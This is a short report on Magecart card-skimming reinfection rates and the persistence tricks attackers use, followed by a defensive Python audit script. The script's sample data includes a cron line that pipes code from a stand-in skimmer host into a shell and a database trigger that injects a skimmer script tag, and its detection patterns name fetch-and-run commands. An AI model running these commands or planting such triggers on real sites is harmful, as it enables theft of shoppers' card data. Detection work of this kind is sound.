Researchers have tracked Magecart-like infections on more than 40,000 domains since 2015. The researcher says that during August, September, and October, his scanner detected Magecart-like card skimming malware on over 5,400 domains. 21.3 percent of the cleaned shops got reinfected. A large number of reinfections occurred within the first day, or after a week, but on average, the reinfection time was 10.5 days.
"This shows that countermeasures taken by merchants and their contracted security firms often fail. There are multiple reasons for this," the researcher said. The expert listed:

1/ Magecart operatives often litter a hacked store with backdoors and rogue admin accounts.
2/ Magecart operatives use reinfection mechanisms such as database triggers and hidden periodic tasks to reinstate their payload.
3/ Magecart operatives use obfuscation techniques to make their presence indistinguishable from legitimate code.
4/ Magecart operatives utilize unpublished security exploits (aka 0days) to hack sites, exploits for which there are no patches.

"All in all, it takes some very keen eyes and a lot of effort to clean all traces of a breach," he said.
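
A post-cleanup check for the persistence mechanisms in points 1 and 2 (rogue admin accounts, database triggers, hidden periodic tasks), added here as an example; it is not code from the researcher or the original article. The input shapes, marker patterns, names and sample data are assumptions constructed for illustration, and pattern matching of this kind will miss the obfuscated payloads of point 3.

```python
import re

# Content that does not belong in a trigger body: markup, URLs, JS decoders.
TRIGGER_MARKERS = re.compile(r"<script|https?://|atob\(|fromCharCode|eval\(", re.I)
# Scheduled jobs that fetch or decode code and hand it to an interpreter.
CRON_MARKERS = re.compile(
    r"(curl|wget)\b.*\|\s*(sh|bash|php)\b|base64\s+(-d|--decode)|php\s+-r\b", re.I)


def audit_persistence(triggers, cron_lines, admins, known_admins):
    """Return (kind, name, reason) findings for a post-cleanup review."""
    findings = []
    for t in triggers:
        if TRIGGER_MARKERS.search(t["statement"]):
            findings.append(("trigger", t["name"],
                             "script/URL content in trigger on " + t["table"]))
    for line in cron_lines:
        line = line.strip()
        if line and not line.startswith("#") and CRON_MARKERS.search(line):
            findings.append(("cron", line, "fetches or decodes code at run time"))
    for user in admins:
        if user not in known_admins:
            findings.append(("admin", user, "not in the known-good baseline"))
    return findings


# Constructed sample data (not from the article). Trigger rows mirror a dump of
# MySQL's information_schema.TRIGGERS; cron lines mirror `crontab -l` output.
SAMPLE_TRIGGERS = [
    {"name": "trg_stock_reindex", "table": "inventory",
     "statement": "UPDATE stock_index SET dirty = 1 WHERE item_id = NEW.item_id"},
    {"name": "trg_order_after", "table": "orders",
     "statement": "UPDATE page_footer SET html = "
                  "'<script src=\"https://skimmer.example/x.js\"></script>'"},
]
SAMPLE_CRON = [
    "# shop maintenance",
    "*/5 * * * * /usr/bin/php /var/www/shop/cron.php",
    "*/10 * * * * curl -s https://skimmer.example/r | sh",
]
SAMPLE_ADMINS = ["owner", "support_tmp"]
KNOWN_ADMINS = {"owner"}

if __name__ == "__main__":
    for finding in audit_persistence(SAMPLE_TRIGGERS, SAMPLE_CRON,
                                     SAMPLE_ADMINS, KNOWN_ADMINS):
        print(finding)
```

The admin check compares against a baseline recorded before the breach rather than account age, since a rogue account may predate the visible skimmer.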